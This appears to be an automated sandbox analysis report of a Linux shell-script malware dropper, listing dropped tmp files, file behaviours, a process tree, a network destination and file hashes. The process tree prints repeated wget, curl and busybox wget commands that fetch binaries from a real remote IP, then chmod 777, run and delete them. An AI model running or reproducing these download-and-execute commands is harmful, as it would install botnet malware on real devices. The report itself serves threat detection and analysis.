N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A

Processes

/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97